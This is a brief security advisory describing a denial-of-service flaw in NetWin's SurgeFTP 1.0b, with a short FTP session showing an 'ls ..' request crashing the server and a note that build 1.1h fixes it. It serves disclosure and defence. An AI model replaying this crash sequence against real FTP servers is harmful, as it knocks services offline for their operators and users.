SurgeFTP 1.0b Denial of Service

VERSION AFFECTED

  • NetWin’s SurgeFTP 1.0b

DESCRIPTION

A Denial of Service (DoS) condition exists in NetWin’s SurgeFTP 1.0b that lets any user with local access to the SurgeFTP host crash the server. Issuing a malformed request for a directory listing such as “ls ..” after successfully initializing a previous valid request for a listing might crash the server.

DEMONSTRATION

SNS Research provided the following proof-of-concept scenario:

# ftp localhost

Connected to testbak

220 SurgeFTP testbak (Version 1.0b)

User (testbak:(none)): anonymous

331 Password required for anonymous.

Password:

230- Alias      Real path       Access

230- /          /home           read

230 User anonymous logged in.

ftp> ls /

200 Port command successful.

150 Opening ASCII mode data connection for file list. (/)

226 Transfer complete.

ftp> ls ..

200 Port command successful.

150 Opening ASCII mode data connection for file list. (/..)

-> ftp get:Connection reset by peer

 

(..)

VENDOR RESPONSE

The vendor, NetWin, has released build v1.1h that corrects this issue. It is available at ftp://ftp.netwinsite.com/pub/surgeftp/surgeftp11h_nt.exe

CREDIT
Discovered by SNS Research.

 

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish